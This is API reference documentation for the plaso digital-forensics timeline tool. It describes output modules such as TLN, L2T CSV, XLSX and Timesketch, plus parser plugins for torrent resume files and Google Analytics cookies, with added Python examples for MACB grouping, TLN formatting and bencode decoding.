Output module for a Keyhole Markup Language (KML) XML file.
DESCRIPTION = 'Saves events with geography data into a KML format.'
NAME = 'kml'
WriteEventBody(event, event_data, event_data_stream, event_tag)
Writes event values to the output.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
WriteFooter()
Writes the footer to the output.
WriteHeader()
Writes the header to the output.
plaso.output.l2t_csv module
Output module for the log2timeline (L2T) CSV format.
For documentation on the L2T CSV format see: https://forensicswiki.xyz/wiki/index.php?title=L2T_CSV
class plaso.output.l2t_csv.L2TCSVEventFormattingHelper(output_mediator, field_formatting_helper, field_names, field_delimiter=',')
Bases: plaso.output.shared_dsv.DSVEventFormattingHelper
L2T CSV output module event formatting helper.
GetFormattedEventMACBGroup(event_macb_group)
Retrieves a string representation of the event MACB group.
Parameters event_macb_group (list[tuple[EventObject, EventData, EventDataStream, EventTag]]) – group of events with identical timestamps, attributes and values.
Returns string representation of the event MACB group.
Return type str
class plaso.output.l2t_csv.L2TCSVFieldFormattingHelper(output_mediator)
Bases: plaso.output.formatting_helper.FieldFormattingHelper
L2T CSV output module field formatting helper.
class plaso.output.l2t_csv.L2TCSVOutputModule(output_mediator)
Bases: plaso.output.interface.LinearOutputModule
CSV format used by log2timeline, with 17 fixed fields.
DESCRIPTION = 'CSV format used by legacy log2timeline, with 17 fixed fields.'
NAME = 'l2tcsv'
WriteEventMACBGroup(event_macb_group)
Writes an event MACB group to the output.
Parameters event_macb_group (list[tuple[EventObject, EventData, EventDataStream, EventTag]]) – group of events with identical timestamps, attributes and values.
WriteHeader()
Writes the header to the output.
plaso.output.logger module
The output sub module logger.
plaso.output.manager module
Output plugin manager.
class plaso.output.manager.OutputManager
Bases: object
Output module manager.
classmethod DeregisterOutput(output_class)
Deregisters an output class.
The output classes are identified based on their NAME attribute.
Parameters output_class (type) – output module class.
Raises KeyError – if output class is not set for the corresponding data type.
classmethod GetDisabledOutputClasses()
Retrieves the disabled output classes and their associated names.
Yields tuple[str, type] – output module name and class.
classmethod GetOutputClass(name)
Retrieves the output class for a specific name.
Parameters name (str) – name of the output module.
Returns output module class.
Return type type
Raises
• KeyError – if there is no output class found with the supplied name.
• ValueError – if name is not a string.
classmethod GetOutputClasses()
Retrieves the available output classes and their associated names.
Yields tuple[str, type] – output class name and type object.
classmethod HasOutputClass(name)
Determines if a specific output class is registered with the manager.
Parameters name (str) – name of the output module.
Returns True if the output class is registered.
Return type bool
classmethod IsLinearOutputModule(name)
Determines if a specific output class is a linear output module.
Parameters name (str) – name of the output module.
Returns True if the output module is linear.
Return type bool
classmethod NewOutputModule(name, output_mediator)
Creates a new output module object for the specified output format.
Parameters
• name (str) – name of the output module.
• output_mediator (OutputMediator) – output mediator.
Returns output module.
Return type OutputModule
Raises
• KeyError – if there is no output class found with the supplied name.
• ValueError – if name is not a string.
classmethod RegisterOutput(output_class, disabled=False)
Registers an output class.
The output classes are identified based on their NAME attribute.
Parameters
• output_class (type) – output module class.
• disabled (Optional[bool]) – True if the output module is disabled, for example because the module did not load correctly.
Raises KeyError – if output class is already set for the corresponding name.
classmethod RegisterOutputs(output_classes, disabled=False)
Registers output classes.
The output classes are identified based on their NAME attribute.
Parameters
• output_classes (list[type]) – output module classes.
• disabled (Optional[bool]) – True if the output modules are disabled, for example because a module did not load correctly.
Raises KeyError – if output class is already set for the corresponding name.
plaso.output.mediator module
The output mediator object.
class plaso.output.mediator.OutputMediator(knowledge_base, formatter_mediator, data_location=None, preferred_encoding='utf-8')
Bases: object
Output mediator.
data_location
path of the formatter data files.
Type Optional[str]
GetDisplayNameForPathSpec(path_spec)
Retrieves the display name for a path specification.
Parameters path_spec (dfvfs.PathSpec) – path specification.
Returns human readable version of the path specification.
Return type str
GetEventFormatter(event_data)
Retrieves the event formatter for a specific event data type.
Parameters event_data (EventData) – event data.
Returns event formatter or None.
Return type EventFormatter
GetFormattedMessages(event_data)
Retrieves the formatted messages related to the event data.
Parameters event_data (EventData) – event data.
Returns
tuple containing:
• str: full message string or None if no event formatter was found.
• str: short message string or None if no event formatter was found.
Return type tuple
GetHostname(event_data, default_hostname='-')
Retrieves the hostname related to the event.
Parameters
• event_data (EventData) – event data.
• default_hostname (Optional[str]) – default hostname.
Returns hostname.
Return type str
GetMACBRepresentation(event, event_data)
Retrieves the MACB representation.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
Returns MACB representation.
Return type str
GetMACBRepresentationFromDescriptions(timestamp_descriptions)
Determines the MACB representation from the timestamp descriptions.
MACB representation is a shorthand for representing one or more of modification, access, change, birth timestamp descriptions as the letters “MACB” or a “.” if the corresponding timestamp is not set.
Note that this is an output format shorthand and does not guarantee that the timestamps represent the same occurrence.
Parameters timestamp_descriptions (list[str]) – timestamp descriptions, which are defined in definitions.TIME_DESCRIPTIONS.
Returns MACB representation.
Return type str
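The MACB shorthand described here, together with the event MACB grouping that WriteEventMACBGroup in plaso.output.interface relies on (events sharing a timestamp and identical event data), as an added example that is not plaso's own code. The timestamp description strings are assumed to mirror plaso.lib.definitions; the tuple-based event records, the data attributes and the sample events are constructed for this example.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Timestamp description strings, assumed to mirror plaso.lib.definitions.
# The exact values are an assumption of this added example.
TIME_DESCRIPTION_MODIFICATION = 'Content Modification Time'
TIME_DESCRIPTION_LAST_ACCESS = 'Last Access Time'
TIME_DESCRIPTION_CHANGE = 'Metadata Modification Time'
TIME_DESCRIPTION_CREATION = 'Creation Time'

# Letter of the MACB shorthand and the timestamp description it stands for.
MACB_LETTERS = (
    ('M', TIME_DESCRIPTION_MODIFICATION),
    ('A', TIME_DESCRIPTION_LAST_ACCESS),
    ('C', TIME_DESCRIPTION_CHANGE),
    ('B', TIME_DESCRIPTION_CREATION),
)

# Constructed event record: (timestamp in POSIX seconds, timestamp description,
# event data attributes). Plaso's EventObject/EventData are not used here.
SampleEvent = Tuple[int, str, Dict[str, str]]


def GetMACBRepresentationFromDescriptions(timestamp_descriptions: Iterable[str]) -> str:
    """Builds the MACB shorthand, writing '.' for each timestamp that is not set."""
    present = set(timestamp_descriptions)
    return ''.join(letter if description in present else '.'
                   for letter, description in MACB_LETTERS)


def GroupMACBEvents(events: Iterable[SampleEvent]) -> Dict[tuple, List[str]]:
    """Groups events that share a timestamp and identical event data.

    The key is (timestamp, sorted event data items); the value collects the
    timestamp descriptions seen for that key. Only timestamp and data are
    compared, so unrelated occurrences that happen to coincide are grouped
    too, which is exactly the caveat the module notes.
    """
    groups = defaultdict(list)
    for timestamp, description, data in events:
        key = (timestamp, tuple(sorted(data.items())))
        groups[key].append(description)
    return groups


def RenderMACBRows(events: Iterable[SampleEvent]) -> List[Tuple[int, str, str]]:
    """Returns one (timestamp, MACB, filename) row per group, ordered by time and name."""
    rows = []
    for (timestamp, data_items), descriptions in GroupMACBEvents(events).items():
        filename = dict(data_items).get('filename', '')
        rows.append((timestamp,
                     GetMACBRepresentationFromDescriptions(descriptions),
                     filename))
    return sorted(rows, key=lambda row: (row[0], row[2]))


# Constructed sample: /etc/passwd was modified, accessed and had its metadata
# changed in the same second and was created earlier; /etc/shadow was modified.
PASSWD = {'data_type': 'fs:stat', 'filename': '/etc/passwd'}
SHADOW = {'data_type': 'fs:stat', 'filename': '/etc/shadow'}
SAMPLE_EVENTS: List[SampleEvent] = [
    (1600000000, TIME_DESCRIPTION_MODIFICATION, PASSWD),
    (1600000000, TIME_DESCRIPTION_LAST_ACCESS, PASSWD),
    (1600000000, TIME_DESCRIPTION_CHANGE, PASSWD),
    (1500000000, TIME_DESCRIPTION_CREATION, PASSWD),
    (1600000000, TIME_DESCRIPTION_MODIFICATION, SHADOW),
]

if __name__ == '__main__':
    for timestamp, macb, filename in RenderMACBRows(SAMPLE_EVENTS):
        print(f'{timestamp} {macb} {filename}')
```

The three /etc/passwd events at the same second collapse into one MAC. row, while the earlier creation time stays a separate ...B row: the shorthand compresses the output but, as the text notes, says nothing about whether the grouped timestamps stem from the same occurrence.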
GetRelativePathForPathSpec(path_spec)
Retrieves the relative path for a path specification.
Parameters path_spec (dfvfs.PathSpec) – path specification.
Returns relative path of the path specification.
Return type str
GetStoredHostname()
Retrieves the stored hostname.
Returns hostname.
Return type str
GetUsername(event_data, default_username='-')
Retrieves the username related to the event.
Parameters
• event_data (EventData) – event data.
• default_username (Optional[str]) – default username.
Returns username.
Return type str
SetTimezone(timezone)
Sets the timezone.
Parameters timezone (str) – timezone.
Raises ValueError – if the timezone is not supported.
property encoding
preferred encoding.
Type str
property timezone
The timezone.
plaso.output.null module
Null device output module.
class plaso.output.null.NullOutputModule(output_mediator)
Bases: plaso.output.interface.OutputModule
Null device output module.
DESCRIPTION = 'Output module that does not output anything.'
NAME = 'null'
WriteEventBody(event, event_data, event_data_stream, event_tag)
Writes event values to the output.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
plaso.output.rawpy module
Output module for the native (or “raw”) Python format.
class plaso.output.rawpy.NativePythonEventFormattingHelper(output_mediator)
Bases: plaso.output.formatting_helper.EventFormattingHelper
Native (or “raw”) Python output module event formatting helper.
GetFormattedEvent(event, event_data, event_data_stream, event_tag)
Retrieves a string representation of the event.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
Returns string representation of the event.
Return type str
class plaso.output.rawpy.NativePythonOutputModule(output_mediator)
Bases: plaso.output.interface.LinearOutputModule
Output module for native (or “raw”) Python output format.
DESCRIPTION = 'native (or "raw") Python output.'
NAME = 'rawpy'
plaso.output.shared_dsv module
Shared functionality for delimiter separated values output modules.
class plaso.output.shared_dsv.DSVEventFormattingHelper(output_mediator, field_formatting_helper, field_names, field_delimiter=',')
Bases: plaso.output.formatting_helper.EventFormattingHelper
Delimiter separated values output module event formatting helper.
GetFormattedEvent(event, event_data, event_data_stream, event_tag)
Retrieves a string representation of the event.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
Returns string representation of the event.
Return type str
GetFormattedFieldNames()
Retrieves a string representation of the field names.
Returns string representation of the field names.
Return type str
SetFieldDelimiter(field_delimiter)
Sets the field delimiter.
Parameters field_delimiter (str) – field delimiter.
SetFields(field_names)
Sets the names of the fields to output.
Parameters field_names (list[str]) – names of the fields to output.
class plaso.output.shared_dsv.DSVOutputModule(output_mediator, field_formatting_helper, names, delimiter=',', header=None)
Bases: plaso.output.interface.LinearOutputModule
Shared functionality for delimiter separated values output modules.
SetFieldDelimiter(field_delimiter)
Sets the field delimiter.
Parameters field_delimiter (str) – field delimiter.
SetFields(field_names)
Sets the names of the fields to output.
Parameters field_names (list[str]) – names of the fields to output.
WriteHeader()
Writes the header to the output.
plaso.output.shared_elastic module
Shared functionality for Elasticsearch output modules.
class plaso.output.shared_elastic.SharedElasticsearchFieldFormattingHelper(output_mediator)
Bases: plaso.output.formatting_helper.FieldFormattingHelper
Shared Elasticsearch output module field formatting helper.
GetFormattedField(field_name, event, event_data, event_data_stream, event_tag)
Formats the specified field.
Parameters
• field_name (str) – name of the field.
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
Returns value of the field or None if not set.
Return type object
class plaso.output.shared_elastic.SharedElasticsearchOutputModule(output_mediator)
Bases: plaso.output.interface.OutputModule
Shared functionality for an Elasticsearch output module.
Close()
Closes connection to Elasticsearch.
Inserts any remaining buffered event documents.
NAME = 'elastic_shared'
SetCACertificatesPath(ca_certificates_path)
Sets the path to the CA certificates.
Parameters ca_certificates_path (str) – path to file containing a list of root certificates to trust.
Raises BadConfigOption – if the CA certificates file does not exist.
SetDocumentType(document_type)
Sets the document type.
Parameters document_type (str) – document type.
SetFlushInterval(flush_interval)
Set the flush interval.
Parameters flush_interval (int) – number of events to buffer before doing a bulk insert.
SetIndexName(index_name)
Set the index name.
Parameters index_name (str) – name of the index.
SetPassword(password)
Set the password.
Parameters password (str) – password to authenticate with.
SetServerInformation(server, port)
Set the server information.
Parameters
• server (str) – IP address or hostname of the server.
• port (int) – Port number of the server.
SetURLPrefix(url_prefix)
Sets the URL prefix.
Parameters url_prefix (str) – URL prefix.
SetUseSSL(use_ssl)
Sets the use of SSL.
Parameters use_ssl (bool) – True to enforce the use of SSL.
SetUsername(username)
Sets the username.
Parameters username (str) – username to authenticate with.
WriteEventBody(event, event_data, event_data_stream, event_tag)
Writes event values to the output.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
plaso.output.shared_json module
Shared functionality for JSON based output modules.
class plaso.output.shared_json.JSONEventFormattingHelper(output_mediator)
Bases: plaso.output.formatting_helper.EventFormattingHelper
JSON output module event formatting helper.
GetFormattedEvent(event, event_data, event_data_stream, event_tag)
Retrieves a string representation of the event.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
Returns string representation of the event.
Return type str
plaso.output.timesketch_out module
Timesketch output module.
class plaso.output.timesketch_out.TimesketchOutputModule(output_mediator)
Bases: plaso.output.shared_elastic.SharedElasticsearchOutputModule
Output module for Timesketch.
Close()
Closes the connection to the Timesketch Elasticsearch database.
Sends the remaining events for indexing and removes the processing status on the Timesketch search index object.
DESCRIPTION = 'Create a Timesketch timeline.'
GetMissingArguments()
Retrieves a list of arguments that are missing from the input.
Returns
names of arguments that are required by the module and have not been specified.
Return type list[str]
NAME = 'timesketch'
SetTimelineName(timeline_name)
Sets the timeline name.
Parameters timeline_name (str) – timeline name.
SetTimelineOwner(username)
Sets the username of the user that should own the timeline.
Parameters username (str) – username.
WriteHeader()
Sets up the Elasticsearch index and the Timesketch database object.
Creates the Elasticsearch index with Timesketch specific settings and the Timesketch SearchIndex database object.
plaso.output.tln module
Output module for the TLN format.
For documentation on the TLN format see: https://forensicswiki.xyz/wiki/index.php?title=TLN
class plaso.output.tln.L2TTLNOutputModule(output_mediator)
Bases: plaso.output.shared_dsv.DSVOutputModule
Output module for the log2timeline extended variant of the TLN format.
l2tTLN is an extended variant of TLN introduced in log2timeline 0.65.
l2tTLN extends basic TLN to 7 | separated fields, namely:
• Time - 32-bit POSIX (or Unix) epoch timestamp.
• Source - The name of the parser or plugin that produced the event.
• Host - The source host system.
• User - The user associated with the data.
• Description - Message string describing the data.
• TZ - L2T 0.65 field. Timezone of the event.
• Notes - L2T 0.65 field. Optional notes field or filename and inode.
DESCRIPTION = 'Extended TLN 7 field | delimited output.'
NAME = 'l2ttln'
class plaso.output.tln.TLNFieldFormattingHelper(output_mediator)
Bases: plaso.output.formatting_helper.FieldFormattingHelper
TLN output module field formatting helper.
class plaso.output.tln.TLNOutputModule(output_mediator)
Bases: plaso.output.shared_dsv.DSVOutputModule
Output module for the TLN format.
TLN defines 5 | separated fields, namely:
• Time - 32-bit POSIX (or Unix) epoch timestamp.
• Source - The name of the parser or plugin that produced the event.
• Host - The source host system.
• User - The user associated with the data.
• Description - Message string describing the data.
DESCRIPTION = 'TLN 5 field | delimited output.'
NAME = 'tln'
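The two field layouts above (5-field TLN and 7-field l2tTLN) as a small writer and reader, added here as an example; it is not plaso's own output module code. TimelineEvent, the SAMPLE_EVENTS and the choice to replace a "|" inside a field value with a space are this example's assumptions, made so that a field can never shift the columns after it.

```python
"""Write and read back TLN / l2tTLN lines (added example, not plaso code)."""
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import List

# Field names as listed in the plaso TLN and l2tTLN output module docstrings.
TLN_FIELDS = ["Time", "Source", "Host", "User", "Description"]
L2TTLN_FIELDS = TLN_FIELDS + ["TZ", "Notes"]
DELIMITER = "|"


@dataclass
class TimelineEvent:
    """Constructed stand-in for an event: only the values TLN needs."""
    timestamp: datetime       # must be timezone-aware
    source: str               # parser or plugin name
    host: str
    user: str
    description: str
    notes: str = ""


def _sanitize(value: str) -> str:
    """A delimiter or line break inside a field would shift every column
    after it; replace them with a space (this example's assumption, not a
    statement about plaso's own escaping)."""
    return value.replace(DELIMITER, " ").replace("\n", " ").replace("\r", " ")


def format_tln(event: TimelineEvent, extended: bool = False) -> str:
    """Return one TLN (5 field) or l2tTLN (7 field) line for the event."""
    if event.timestamp.tzinfo is None:
        raise ValueError("TLN Time is a POSIX timestamp; datetime must be tz-aware")
    # 32-bit POSIX epoch seconds: TLN carries no sub-second precision.
    epoch = int(event.timestamp.timestamp())
    if not 0 <= epoch <= 0x7FFFFFFF:
        raise ValueError("timestamp outside the 32-bit POSIX range TLN can carry")
    fields = [str(epoch), event.source, event.host, event.user, event.description]
    if extended:
        fields += [event.timestamp.tzname() or "UTC", event.notes]
    return DELIMITER.join(_sanitize(field) for field in fields)


def parse_tln(line: str) -> dict:
    """Split a TLN or l2tTLN line into a dict keyed by field name.
    Anything that is not 5 or 7 fields is rejected rather than guessed at."""
    parts = line.rstrip("\r\n").split(DELIMITER)
    if len(parts) == len(TLN_FIELDS):
        names = TLN_FIELDS
    elif len(parts) == len(L2TTLN_FIELDS):
        names = L2TTLN_FIELDS
    else:
        raise ValueError(f"expected 5 or 7 fields, got {len(parts)}: {line!r}")
    record = dict(zip(names, parts))
    record["Time"] = int(record["Time"])  # fails loudly on a non-numeric Time
    return record


def write_tln(events: List[TimelineEvent], extended: bool = False) -> str:
    """Return the full output text: header line plus one line per event."""
    names = L2TTLN_FIELDS if extended else TLN_FIELDS
    lines = [DELIMITER.join(names)] + [format_tln(e, extended) for e in events]
    return "\n".join(lines) + "\n"


# Constructed sample events (not real case data).
SAMPLE_EVENTS = [
    TimelineEvent(datetime(2020, 10, 7, 12, 0, 0, tzinfo=timezone.utc),
                  "filestat", "host01", "alice", "Last modified /tmp/a.txt",
                  "inode 1234"),
    TimelineEvent(datetime(2020, 10, 7, 12, 5, 30, tzinfo=timezone.utc),
                  "winevtx", "host01", "-", "Logon|Type 10 contains delimiter"),
]

if __name__ == "__main__":
    print(write_tln(SAMPLE_EVENTS, extended=True))
```

Reading lines back through parse_tln is the cheap check that an exported timeline still has one event per line: a field that smuggled a delimiter through shows up as a 6- or 8-field line and is rejected instead of silently shifting Host into User.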
plaso.output.xlsx module
Output module for the Excel Spreadsheet (XLSX) output format.
class plaso.output.xlsx.XLSXOutputModule(output_mediator)
Bases: plaso.output.interface.OutputModule
Output module for the Excel Spreadsheet (XLSX) output format.
Close() Closes the workbook.
DESCRIPTION = 'Excel Spreadsheet (XLSX) output'
NAME = 'xlsx'
Open() Creates a new workbook.
Raises
• IOError – if the specified output file already exists.
• OSError – if the specified output file already exists.
• ValueError – if the filename is not set.
SetFields(fields) Sets the fields to output.
Parameters fields (list[str]) – names of the fields to output.
SetFilename(filename) Sets the filename.
Parameters filename (str) – filename.
SetTimestampFormat(timestamp_format) Sets the timestamp format to use for the datetime column.
Parameters timestamp_format (str) – format string of date and time values.
WriteEventBody(event, event_data, event_data_stream, event_tag) Writes event values to the output.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
WriteHeader() Writes the header to the spreadsheet.
Module contents
This file imports Python modules that register output modules.
5.1.11 plaso.parsers package
Subpackages
plaso.parsers.bencode_plugins package
Submodules
plaso.parsers.bencode_plugins.interface module
Bencode parser plugin interface.
BencodePlugin defines the attributes necessary for registration, discovery and operation of plugins for bencoded files which will be used by BencodeParser.
class plaso.parsers.bencode_plugins.interface.BencodePlugin
Bases: plaso.parsers.plugins.BasePlugin
Bencode parser plugin interface.
BENCODE_KEYS = frozenset({'any'})
DATA_FORMAT = 'Bencoded file'
NAME = 'bencode_plugin'
abstract Process(parser_mediator, decoded_values=None, **kwargs) Extracts events from the values of entries within a bencoded file.
This is the main method that a Bencode plugin needs to implement.
The contents of the bencode keys defined in BENCODE_KEYS can be made available to the plugin as both a matched {‘KEY’: ‘value’} and as the entire bencoded data dictionary. The plugin should implement logic to parse the most relevant data set into a useful event for incorporation into the Plaso timeline.
The attributes for a BencodeEvent should include the following:
• root = Root key this event was extracted from.
• key = Key the value resided in.
• time = Date this artifact was created in microseconds (usec) from January 1, 1970 00:00:00 UTC.
• desc = Short description.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• decoded_values (Optional[collections.OrderedDict[bytes|str,object]]) – decoded values.
URLS = []
plaso.parsers.bencode_plugins.transmission module
Bencode parser plugin for Transmission BitTorrent files.
class plaso.parsers.bencode_plugins.transmission.TransmissionEventData
Bases: plaso.containers.events.EventData
Transmission BitTorrent event data.
destination – path of the downloaded file.
Type str
seedtime – client seed time in number of minutes.
Type int
DATA_TYPE = 'p2p:bittorrent:transmission'
class plaso.parsers.bencode_plugins.transmission.TransmissionPlugin
Bases: plaso.parsers.bencode_plugins.interface.BencodePlugin
Parse Transmission BitTorrent activity file for current torrents.
Transmission stores an individual Bencoded file for each active download in a folder named resume under the user’s application data folder.
BENCODE_KEYS = frozenset({'activity-date', 'added-date', 'destination', 'done-date', 'seeding-time-seconds'})
DATA_FORMAT = 'Transmission BitTorrent activity file'
NAME = 'bencode_transmission'
Process(parser_mediator, decoded_values=None, **kwargs) Extracts events from Transmission’s resume folder files.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• decoded_values (Optional[collections.OrderedDict[bytes|str,object]]) – decoded values.
plaso.parsers.bencode_plugins.utorrent module
Bencode parser plugin for uTorrent active torrent files.
class plaso.parsers.bencode_plugins.utorrent.UTorrentEventData
Bases: plaso.containers.events.EventData
uTorrent active torrent event data.
caption – official name of package.
Type str
destination – path of the downloaded file.
Type str
seedtime – client seed time in number of minutes.
Type int
DATA_TYPE = 'p2p:bittorrent:utorrent'
class plaso.parsers.bencode_plugins.utorrent.UTorrentPlugin
Bases: plaso.parsers.bencode_plugins.interface.BencodePlugin
Plugin to parse uTorrent active torrent files.
uTorrent creates a file, resume.dat, and a backup, resume.dat.old, for all active torrents. This is typically stored in the user’s application data folder.
These files, at a minimum, contain a ‘.fileguard’ key and a dictionary with a key name for a particular download with a ‘.torrent’ file extension.
BENCODE_KEYS = frozenset({'.fileguard'})
DATA_FORMAT = 'uTorrent active torrent file'
NAME = 'bencode_utorrent'
Process(parser_mediator, decoded_values=None, **kwargs) Extracts events from uTorrent active torrent files.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• decoded_values (Optional[collections.OrderedDict[bytes|str,object]]) – decoded values.
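The bencode plugin interface and the Transmission plugin above, worked through as an added example: a small bencode decoder that produces the decoded-values dictionary, followed by the BENCODE_KEYS check and the extraction of the three date keys into events. This is example code, not plaso's BencodeParser or its plugins; the SAMPLE_RESUME bytes are constructed, and the reading of the date values as POSIX seconds (with 0 meaning "not yet reached") is this example's assumption, not something the page states.

```python
"""Decode bencode and extract Transmission resume-file events (added example)."""
from collections import OrderedDict
from datetime import datetime, timezone
from typing import Any, List, Tuple

# Keys the page lists in TransmissionPlugin.BENCODE_KEYS.
TRANSMISSION_KEYS = frozenset({
    'activity-date', 'added-date', 'destination', 'done-date',
    'seeding-time-seconds'})


def _decode(data: bytes, pos: int) -> Tuple[Any, int]:
    """Decode one bencode value at pos; returns (value, position after it).
    Every truncated or malformed input ends in ValueError, never in a partial value."""
    prefix = data[pos:pos + 1]
    if prefix == b"i":                        # integer: i<digits>e
        end = data.index(b"e", pos)           # ValueError if no terminator
        return int(data[pos + 1:end]), end + 1
    if prefix == b"l":                        # list: l<values>e
        items, pos = [], pos + 1
        while data[pos:pos + 1] != b"e":
            item, pos = _decode(data, pos)    # raises at end of data
            items.append(item)
        return items, pos + 1
    if prefix == b"d":                        # dictionary: d<key><value>...e
        result, pos = OrderedDict(), pos + 1
        while data[pos:pos + 1] != b"e":
            key, pos = _decode(data, pos)
            if not isinstance(key, bytes):
                raise ValueError(f"dictionary key before offset {pos} is not a byte string")
            value, pos = _decode(data, pos)
            result[key.decode("utf-8", "replace")] = value
        return result, pos + 1
    if prefix.isdigit():                      # byte string: <length>:<bytes>
        colon = data.index(b":", pos)
        length = int(data[pos:colon])
        start = colon + 1
        if start + length > len(data):
            raise ValueError(f"byte string at offset {pos} runs past end of data")
        return data[start:start + length], start + length
    raise ValueError(f"invalid bencode at offset {pos}")


def decode_bencode(data: bytes) -> Any:
    """Decode a complete bencoded document; trailing bytes are an error."""
    value, end = _decode(data, 0)
    if end != len(data):
        raise ValueError(f"{len(data) - end} trailing bytes after bencoded value")
    return value


def extract_transmission_events(decoded: Any) -> List[dict]:
    """Turn a decoded Transmission resume dictionary into timeline events."""
    if not isinstance(decoded, dict):
        raise ValueError("top-level bencode value is not a dictionary")
    missing = TRANSMISSION_KEYS - set(decoded)
    if missing:   # the equivalent of "wrong plugin for this file"
        raise ValueError(f"not a Transmission resume file, missing keys: {sorted(missing)}")
    destination = decoded["destination"].decode("utf-8", "replace")
    seedtime = int(decoded["seeding-time-seconds"]) // 60   # minutes, as on the page
    events = []
    for key, description in (("added-date", "Added Time"),
                             ("done-date", "Download Finished"),
                             ("activity-date", "Last Activity")):
        value = decoded[key]
        # Assumption: dates are POSIX seconds and 0 means the date was never set.
        if not isinstance(value, int) or value <= 0:
            continue
        events.append({
            "timestamp": datetime.fromtimestamp(value, timezone.utc),
            "description": description,
            "destination": destination,
            "seedtime": seedtime,
        })
    return events


# Constructed resume-file content (not captured from a real client).
SAMPLE_RESUME = (b"d13:activity-datei1602072330e10:added-datei1602000000e"
                 b"11:destination8:/dl/file9:done-datei1602050000e"
                 b"20:seeding-time-secondsi3600ee")

if __name__ == "__main__":
    for event in extract_transmission_events(decode_bencode(SAMPLE_RESUME)):
        print(event["timestamp"].isoformat(), event["description"], event["destination"])
```

The decoder keeps dictionary order, which matches the OrderedDict type the interface documents for decoded_values, and the length check on byte strings is what stops a truncated resume file from yielding a half-decoded path without any error.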
Module contents
Imports for the bencode parser.
plaso.parsers.cookie_plugins package
Submodules
plaso.parsers.cookie_plugins.ganalytics module
This file contains a plugin for parsing Google Analytics cookies.
class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventData(cookie_identifier)
Bases: plaso.containers.events.EventData
Google Analytics event data.
cookie_name – name of cookie.
Type str
domain_hash – domain hash.
Type str
pages_viewed – number of pages viewed.
Type int
sessions – number of sessions.
Type int
sources – number of sources.
Type int
url – URL or path where the cookie got set.
Type str
visitor_id – visitor identifier.
Type str
DATA_TYPE = 'cookie:google:analytics'
class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmaPlugin
Bases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin
A browser cookie plugin for __utma Google Analytics cookies.
The structure of the cookie data: <domain hash>.<visitor ID>.<first visit>.<previous visit>.<last visit>.<number of sessions>
For example: 137167072.1215918423.1383170166.1383170166.1383170166.1
Or: <last visit>
For example: 13113225820000000
COOKIE_NAME = '__utma'
DATA_FORMAT = 'Google Analytics __utma cookie'
GetEntries(parser_mediator, cookie_data=None, url=None, **kwargs) Extracts event objects from the cookie.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• cookie_data (str) – cookie data.
• url (str) – URL or path where the cookie got set.
NAME = 'google_analytics_utma'
URLS = ['http://www.dfinews.com/articles/2012/02/google-analytics-cookies-and-forensic-implications']
class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmbPlugin
Bases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin
A browser cookie plugin for __utmb Google Analytics cookies.
The structure of the cookie data: <domain hash>.<pages viewed>.<unknown>.<last time>
For example: 137167072.1.10.1383170166 173272373.6.8.1440489514899 173272373.4.9.1373300660574
Or: <last time>
For example: 13113225820000000
COOKIE_NAME = '__utmb'
DATA_FORMAT = 'Google Analytics __utmb cookie'
GetEntries(parser_mediator, cookie_data=None, url=None, **kwargs) Extracts event objects from the cookie.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• cookie_data (bytes) – cookie data.
• url (str) – URL or path where the cookie got set.
NAME = 'google_analytics_utmb'
URLS = ['http://www.dfinews.com/articles/2012/02/google-analytics-cookies-and-forensic-implications']
class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmtPlugin
Bases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin
A browser cookie plugin for __utmt Google Analytics cookies.
The structure of the cookie data: <last time>
For example: 13113215173000000
COOKIE_NAME = '__utmt'
DATA_FORMAT = 'Google Analytics __utmt cookie'
GetEntries(parser_mediator, cookie_data=None, url=None, **kwargs) Extracts event objects from the cookie.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• cookie_data (bytes) – cookie data.
• url (str) – URL or path where the cookie got set.
NAME = 'google_analytics_utmt'
class plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmzPlugin
Bases: plaso.parsers.cookie_plugins.interface.BaseCookiePlugin
A browser cookie plugin for __utmz Google Analytics cookies.
The structure of the cookie data: <domain hash>.<last time>.<sessions>.<sources>.<variables>
For example: 207318870.1383170190.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)
Or: <last time>
For example: 13128990382000000
COOKIE_NAME = '__utmz'
DATA_FORMAT = 'Google Analytics __utmz cookie'
GetEntries(parser_mediator, cookie_data=None, url=None, **kwargs) Extracts event objects from the cookie.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• cookie_data (str) – cookie data.
• url (str) – URL or path where the cookie got set.
NAME = 'google_analytics_utmz'
